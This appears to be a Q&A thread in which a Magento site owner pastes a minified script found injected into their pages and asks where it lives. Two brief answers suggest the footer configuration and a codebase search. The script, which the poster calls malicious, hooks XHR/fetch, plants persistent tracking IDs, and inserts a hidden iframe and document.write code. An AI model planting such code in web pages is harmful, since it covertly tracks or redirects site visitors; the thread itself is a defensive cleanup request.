# How to locate the source file of a script on Magento website page?

Tags: javascript, html, css, magento, malware

My website [Makimus.com](http://makimus.com) (based on magento 1.9) is facing an issue that on any page sometimes when someone clicks on any link, another web-page in a new tab opens up.
On checking the source code I found a malicious code

```
 <script type="text/javascript">(function(XHR){var open=XHR.prototype.open;var send=XHR.prototype.send;var parser=document.createElement('a');XHR.prototype.open=function(method, url, async, user, pass){if(typeof async=='undefined'){async=true;}parser.href=url;if(parser.host==''){parser.href=parser.href;}this.ajax_hostname=parser.hostname;open.call(this, method, url, async, user, pass);};XHR.prototype.send=function(data){if(location.hostname==this.ajax_hostname)this.setRequestHeader("X-MOD-SBB-CTYPE", "xhr");send.call(this, data);}})(XMLHttpRequest);if(typeof(fetch)!="undefined"){var nsbbfetch=fetch;fetch=function(url, init){function sbbSd(url, domain){if(/^(http)|^(\/\/)/.test(url)){return url.indexOf(domain)!=-1;}return true;}if(sbbSd(url, document.domain)){init=typeof init !=='undefined' ? init :{};if(typeof(init.headers)==="undefined"){init.headers={};}init.headers['X-MOD-SBB-CTYPE']='fetch';}return nsbbfetch(url, init);};}function sbbgc(check_name){var start=document.cookie.indexOf(check_name+"=");var oVal='';var len=start+check_name.length+1;if((!start)&&(document.cookie.substring(0,check_name.length)!=check_name)){oVal='';}else if(start==-1){oVal='';}else{var end=document.cookie.indexOf(';',len);if(end==-1)end=document.cookie.length;var oVal=document.cookie.substring(len,end);};return oVal;}function addmg(inm,ext){var primgobj=document.createElement('IMG');primgobj.src=window.location.protocol+"//"+window.location.hostname+(window.location.port && window.location.port!=80 ? ':'+window.location.port: '')+"/sbbi/?sbbpg="+inm+(ext?"&"+ext:"");var sbbDiv=document.getElementById('sbbfrcc');sbbDiv.appendChild(primgobj);};function addprid(prid){var oldVal=sbbgc("PRLST");if((oldVal.indexOf(prid)==-1)&&(oldVal.split('/').length<5)){if(oldVal!='')oldVal+='/';document.cookie='PRLST='+oldVal+escape(prid)+';path=/';}}var sbbeccf=function(){this.sp3="jass";this.sf1=function(vd){return sf2(vd)+32;};var sf2=function(avd){return avd*12;};this.sf4=function(yavd){return yavd+2;};var strrp=function(str, key, value){if(str.indexOf('&'+key+'=')> -1 || str.indexOf(key+'=')==0){var idx=str.indexOf('&'+key+'=');if(idx==-1)idx=str.indexOf(key+'=');var end=str.indexOf('&', idx+1);var newstr;if(end !=-1)newstr=str.substr(0, idx)+str.substr(end+(idx ? 0 : 1))+'&'+key+'='+value;else newstr=str.substr(0, idx)+'&'+key+'='+value;return newstr;}else return str+'&'+key+'='+value;};var strgt=function(name, text){if(typeof text !='string')return "";var nameEQ=name+"=";var ca=text.split(/[;&]/);for(var i=0;i < ca.length;i++){var c=ca[i];while(c.charAt(0)==' ')c=c.substring(1, c.length);if(c.indexOf(nameEQ)==0)return c.substring(nameEQ.length, c.length);}return "";};this.sfecud={f:function(name, value){var fv="";try{var elm=document.getElementById('sbbfrcc');elm.style.behavior="url(#default#userData)";if(typeof(value)!="undefined"){elm.setAttribute(name, value);elm.save(name);}else{elm.load(name);fv=elm.getAttribute(name);}}catch(e){}return fv;}, name:"sbbrf"};this.sfecgs={sbbgh:function(){var domain=document.location.host;if(domain.indexOf('www.')==0)domain=domain.replace('www.', '');return domain;}, f:function(name, value){var fv="";if(window.globalStorage){var host=this.sbbgh();try{if(typeof(value)!="undefined")globalStorage[host][name]=value;else{fv=globalStorage[host][name];if(typeof(fv.toString)!="undefined")fv=fv.toString();}}catch(e){}}return fv;}, name:"sbbrf"};this.sfecls={f:function(name, value){var fv="";try{if(window.localStorage){if(typeof(value)!="undefined")localStorage.setItem(name, value);else{fv=localStorage.getItem(name);if(typeof(fv.toString)!="undefined")fv=fv.toString();}}}catch(e){}return fv;}, name:"sbbrf"};this.sbbcv=function(invl){try{var invalArr=invl.split("-");if(invalArr.length>1){if(invalArr[0]=="A"||invalArr[0]=="D"){invl=invalArr[1];}else invl="";}if(invl==null||typeof(invl)=="undefined"||invl=="falseImgUT"||invl=="undefined"||invl=="null"||invl!=encodeURI(invl))invl="";if(typeof(invl).toLowerCase()=="string")if(invl.length>20)if(invl.substr(0,2)!="h4")invl="";}catch(ex){invl="";}return invl;};this.sbbsv=function(fv){for(var elm in this){if(this[elm].name=="sbbrf"){this[elm].f("altutgv2",fv);}}document.cookie="UTGv2="+fv+';expires=Tue, 31 Dec 2030 00:00:00 UTC;path=/';};this.sbbgv=function(){var valArr=Array();var currVal="";for(var elm in this){if(this[elm].name=="sbbrf"){currVal=this[elm].f("altutgv2");currVal=this.sbbcv(currVal);if(currVal!="")valArr[currVal]=(typeof(valArr[currVal])!="undefined"?valArr[currVal]+1:1);}}var lb=0;var fv="";for(var val in valArr){if(valArr[val]>lb){fv=val;lb=valArr[val]}}if(fv=="")fv=sbbgc("UTGv2");fv=this.sbbcv(fv);if(fv!="")this.sbbsv(fv);else this.sbbsv("D-h45a13ff4793e7ca7f73e342d4056764b150");return fv;};};function m2vr(m1,m2){var i=0;var rc="";var est="ghijklmnopqrstuvwyz";var rnum;var rpl;var charm1=m1.charAt(i);var charm2=m2.charAt(i);while(charm1!=""||charm2!=""){rnum=Math.floor(Math.random()* est.length);rpl=est.substring(rnum,rnum+1);rc+=(charm1==""?rpl:charm1)+(charm2==""?rpl:charm2);i++;charm1=m1.charAt(i);charm2=m2.charAt(i);}return rc;}function sbbls(prid){try{var eut=sbbgc("UTGv2");sbbeccfi=new sbbeccf();window.sbbgs=sbbeccfi.sbbgv();if(eut!=sbbgs && sbbgs!="" && typeof(sbbfcr)=="undefined"){addmg('utMedia',"vii="+m2vr("99cf26b776109481e52fb922e5bf0760",sbbgs));}var sbbiframeObj=document.createElement('IFRAME');var dfx=new Date();sbbiframeObj.id='SBBCrossIframe';sbbiframeObj.title='SBBCrossIframe';sbbiframeObj.tabindex='-1';sbbiframeObj.lang='en';sbbiframeObj.style.visibility='hidden';sbbiframeObj.setAttribute('aria-hidden', 'true');sbbiframeObj.style.border='0px';if(document.all){sbbiframeObj.style.position='absolute';sbbiframeObj.style.top='-1px';sbbiframeObj.style.height='1px';sbbiframeObj.style.width='28px';}else{sbbiframeObj.style.height='1px';sbbiframeObj.style.width='0px';}sbbiframeObj.scrolling="NO";sbbiframeObj.src=window.location.protocol+"//"+window.location.hostname+(window.location.port && window.location.port!=80 ? ':'+window.location.port: '')+'/sbbi/?sbbpg=sbbShell&gprid='+prid + '&sbbgs='+sbbgs+'&ddl='+(Math.round(dfx.getTime()/1000)-1529250201)+'';var sbbDiv=document.getElementById('sbbfrcc');sbbDiv.appendChild(sbbiframeObj);}catch(ex){;}}try{y=unescape(sbbvscc.replace(/^<\!\-\-\s*|\s*\-\->$/g,''));document.getElementById('sbbhscc').innerHTML=y;x=unescape(sbbgscc.replace(/^<\!\-\-\s*|\s*\-\->$/g,''));}catch(e){x='function genPid(){return "jser";}';}try{if(window.gprid==undefined)document.write('<'+'script type="text/javascri'+'pt">'+x+"var gprid=genPid();addprid(gprid);sbbls(gprid);<"+"/script>");}catch(e){addprid("dwer");}</script>
```

Now I know that this piece of code is causing the problem, but I do not know the file that I need to edit in order to delete this code off my website.
May you guys please help in finding the file in which this code might be injected.

Your help is greatly appreciated. Thank you!

Answer (score 0):

It coild be anywhere. One common place where malicious script get iserted is system configuration.

Check *System -> Configuration -> Design -> Footer -> Miscellaneous HTML* for any unusual scripts.

Answer (score 0):

You should try to execute searches of pieces of the code on your full codebase. Also, I suggest to start searching for this instead of the script ; the script looks for this div in your page, and it could be dynamically loaded here.
[image]